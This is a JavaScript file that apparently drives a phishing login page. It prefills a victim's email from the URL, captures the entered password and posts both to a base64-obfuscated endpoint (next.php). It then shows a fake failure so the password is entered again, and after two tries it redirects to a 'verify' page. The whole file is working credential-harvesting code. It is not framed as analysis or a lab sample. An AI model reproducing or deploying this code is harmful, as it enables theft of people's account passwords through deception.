
/* global $ */
$(document).ready(function() {
    var count = 0;

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
    ///////////////url getting ai////////////////


    var file = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("User ID field is empty.!");
            return false;
        }

        // if (!filter.test(my_ai)) {
        //     $('#error').show();
        //     $('#error').html("That account doesn't exist. Enter a different account");
        //     return false;
        // }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },

            complete: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("./verify.html");
                    return false;
                }
                $("#msg").show();
                $('#submit-btn').html('Login');
            }
        });
    });


});
